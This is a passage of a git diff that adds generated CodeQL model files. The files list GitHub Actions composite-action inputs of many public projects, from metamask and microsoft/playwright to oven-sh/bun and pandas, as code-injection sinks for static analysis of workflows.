000000000000..2cf57246d0c4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml new file mode 100644 index 000000000000..9f62363e1692 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml new file mode 100644 index 000000000000..0dfbad39abea --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.blob_prefix", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.output_dir", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.path", "code-injection", "generated"] + - ["microsoft/playwright", "*", "input.namePrefix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/actions/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml new file mode 100644 index 000000000000..eb76e7d7a452 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] + - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/actions/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml new file mode 100644 index 000000000000..7672a6aadbbc --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/actions/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml new file mode 100644 index 000000000000..041705b1f558 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/actions/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml new file mode 100644 index 000000000000..b80d135bfb3a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] + - ["modin-project/modin", "*", "input.activate-environment", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml new file mode 100644 index 000000000000..2e6fc133dd9a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] + - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml new file mode 100644 index 000000000000..710cd7951619 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mozilla/bedrock", "*", "input.", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml b/actions/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml new file mode 100644 index 000000000000..e64c87b9e073 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mozilla_sccache.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mozilla/sccache", "*", "input.name", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml b/actions/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml new file mode 100644 index 000000000000..2d663b075be4 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/msys2_setup-msys2.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["msys2/setup-msys2", "*", "input.systems", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml b/actions/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml new file mode 100644 index 000000000000..95b63bfadd0d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/mumble-voip_mumble.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["mumble-voip/mumble", "*", "input.arch", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.type", "code-injection", "generated"] + - ["mumble-voip/mumble", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml b/actions/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml new file mode 100644 index 000000000000..88da6f066378 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nasa_fprime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nasa/fprime", "*", "input.location", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml b/actions/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml new file mode 100644 index 000000000000..841140aa12e8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nats-io_nats-server.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nats-io/nats-server", "*", "input.label", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_password", "code-injection", "generated"] + - ["nats-io/nats-server", "*", "input.hub_username", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml b/actions/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml new file mode 100644 index 000000000000..04657e223adb --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nearform-actions_optic-release-automation-action.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nearform-actions/optic-release-automation-action", "*", "input.build-command", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-name", "code-injection", "generated"] + - ["nearform-actions/optic-release-automation-action", "*", "input.actor-email", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/nektos_act.model.yml b/actions/ql/lib/ext/generated/composite-actions/nektos_act.model.yml new file mode 100644 index 000000000000..7541c5b8dabe --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nektos_act.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nektos/act", "*", "input.test_input_optional", "code-injection", "generated"] + - ["nektos/act", "*", "input.composite-input", "code-injection", "generated"] + - ["nektos/act", "*", "input.some", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required_with_default", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_optional_with_default_overriden", "code-injection", "generated"] + - ["nektos/act", "*", "input.test_input_required", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml b/actions/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml new file mode 100644 index 000000000000..2f4033d0825f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/neo4j-contrib_neo4j-apoc-procedures.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.project-name", "code-injection", "generated"] + - ["neo4j-contrib/neo4j-apoc-procedures", "*", "input.gradle-command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml b/actions/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml new file mode 100644 index 000000000000..aeed286a882a --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/neondatabase_neon.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["neondatabase/neon", "*", "input.save_perf_report", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_region", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.real_s3_bucket", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_with_real_s3", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.run_in_parallel", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.extra_params", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.test_selection", "code-injection", "generated"] + - ["neondatabase/neon", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml b/actions/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml new file mode 100644 index 000000000000..4d980520bc32 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/neovim_neovim.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["neovim/neovim", "*", "input.install_flags", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml b/actions/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml new file mode 100644 index 000000000000..265179054337 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nhost_nhost.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nhost/nhost", "*", "input.config", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml b/actions/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml new file mode 100644 index 000000000000..af31a4267fda --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nix-community_nixos-wsl.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nix-community/nixos-wsl", "*", "input.filename", "code-injection", "generated"] + - ["nix-community/nixos-wsl", "*", "input.expression", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml b/actions/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml new file mode 100644 index 000000000000..6317a72443c0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/novuhq_novu.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["novuhq/novu", "*", "input.tag", "code-injection", "generated"] + - addsTo: + pack: codeql/actions-all + extensible: actionsSummaryModel + data: + - ["novuhq/novu", "*", "input.docker_name", "output.image", "taint", "manual"] diff --git a/actions/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml b/actions/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml new file mode 100644 index 000000000000..3b2bcb74bb62 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/nymtech_nym.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["nymtech/nym", "*", "input.version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml b/actions/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml new file mode 100644 index 000000000000..320eabd533c6 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/obsproject_obs-studio.model.yml @@ -0,0 +1,19 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["obsproject/obs-studio", "*", "input.failCondition", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.checkGlob", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.playtestBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamPassword", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.steamUser", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.preview", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.stableBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.betaBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.nightlyBranch", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.tagName", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customLink", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.customTitle", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.urlPrefix", "code-injection", "generated"] + - ["obsproject/obs-studio", "*", "input.sparklePrivateKey", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml b/actions/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml new file mode 100644 index 000000000000..3af9358c65e9 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/ocaml_dune.model.yml @@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["ocaml/dune", "*", "input.OCAML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DKML_COMPILER", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.DISKUV_OPAM_REPOSITORY", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.CONF_DKML_CROSS_TOOLCHAIN", "code-injection", "generated"] + - ["ocaml/dune", "*", "input.FDOPEN_OPAMEXE_BOOTSTRAP", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml b/actions/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml new file mode 100644 index 000000000000..a61edccecf87 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/oneflow-inc_oneflow.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["oneflow-inc/oneflow", "*", "input.extra_flags", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.python_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.cuda_version", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.tmp_dir", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_host", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.dst_path", "code-injection", "generated"] + - ["oneflow-inc/oneflow", "*", "input.src_path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml new file mode 100644 index 000000000000..2f7f8c150300 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby-contrib.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.latest", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby-contrib", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml new file mode 100644 index 000000000000..72601a404073 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/open-telemetry_opentelemetry-ruby.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-telemetry/opentelemetry-ruby", "*", "input.gem", "code-injection", "generated"] + - ["open-telemetry/opentelemetry-ruby", "*", "input.ruby", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml b/actions/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml new file mode 100644 index 000000000000..6808b4a28933 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/open-watcom_open-watcom-v2.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["open-watcom/open-watcom-v2", "*", "input.fullname", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.buildcmd", "code-injection", "generated"] + - ["open-watcom/open-watcom-v2", "*", "input.artifact", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml b/actions/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml new file mode 100644 index 000000000000..93c348e570a8 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/openapitools_openapi-generator.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openapitools/openapi-generator", "*", "input.args", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.name", "code-injection", "generated"] + - ["openapitools/openapi-generator", "*", "input.goal", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml b/actions/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml new file mode 100644 index 000000000000..31be17adf41b --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/openjdk_jdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openjdk/jdk", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml new file mode 100644 index 000000000000..89f2daede979 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_opensearch-net.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["opensearch-project/opensearch-net", "*", "input.version", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.build_script", "code-injection", "generated"] + - ["opensearch-project/opensearch-net", "*", "input.plugins_output_directory", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml new file mode 100644 index 000000000000..ce881a46225d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/opensearch-project_security.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["opensearch-project/security", "*", "input.plugin-branch", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml b/actions/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml new file mode 100644 index 000000000000..cd422d4278d1 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/opentrons_opentrons.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["opentrons/opentrons", "*", "input.destPrefix", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.domain", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.distPath", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.project", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.python-version", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.repository_url", "code-injection", "generated"] + - ["opentrons/opentrons", "*", "input.password", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml b/actions/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml new file mode 100644 index 000000000000..82d25587bf99 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/openvinotoolkit_openvino.model.yml @@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_files_changed", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.skip_when_only_listed_labels_set", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.labeler_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config_schema", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.components_config", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.component_pattern", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.ref_name", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.repository", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.commit_sha", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pr", "code-injection", "generated"] + - ["openvinotoolkit/openvino", "*", "input.pip-cache-path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml new file mode 100644 index 000000000000..e6c66721c3f0 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts-upgradeable.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts-upgradeable", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml new file mode 100644 index 000000000000..668e681473df --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/openzeppelin_openzeppelin-contracts.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["openzeppelin/openzeppelin-contracts", "*", "input.layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_layout", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.buildinfo", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.out_report", "code-injection", "generated"] + - ["openzeppelin/openzeppelin-contracts", "*", "input.ref_report", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml b/actions/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml new file mode 100644 index 000000000000..13c965ae30a3 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/oppia_oppia.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["oppia/oppia", "*", "input.webhook-url", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml b/actions/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml new file mode 100644 index 000000000000..726aab85e84e --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/oracle_graal.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["oracle/graal", "*", "input.components", "code-injection", "generated"] + - ["oracle/graal", "*", "input.native-images", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml b/actions/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml new file mode 100644 index 000000000000..4325315c595d --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/oracle_truffleruby.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["oracle/truffleruby", "*", "input.archive", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml b/actions/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml new file mode 100644 index 000000000000..11da4a457089 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/orhun_git-cliff.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["orhun/git-cliff", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml b/actions/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml new file mode 100644 index 000000000000..4064d556702f --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/oven-sh_bun.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["oven-sh/bun", "*", "input.download-url", "code-injection", "generated"] + - ["oven-sh/bun", "*", "input.bun-version", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml b/actions/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml new file mode 100644 index 000000000000..c8d29fbe9f9c --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/owntracks_android.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["owntracks/android", "*", "input.name", "code-injection", "generated"] + - ["owntracks/android", "*", "input.path", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml b/actions/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml new file mode 100644 index 000000000000..5be8efeee399 --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pandas-dev_pandas.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: actionsSinkModel + data: + - ["pandas-dev/pandas", "*", "input.meson_args", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.editable", "code-injection", "generated"] + - ["pandas-dev/pandas", "*", "input.cflags_adds", "code-injection", "generated"] \ No newline at end of file diff --git a/actions/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml b/actions/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml new file mode 100644 index 000000000000..4b4e290a9cba --- /dev/null +++ b/actions/ql/lib/ext/generated/composite-actions/pardeike_harmony.model.yml @@ -0,0 +1,9 @@ 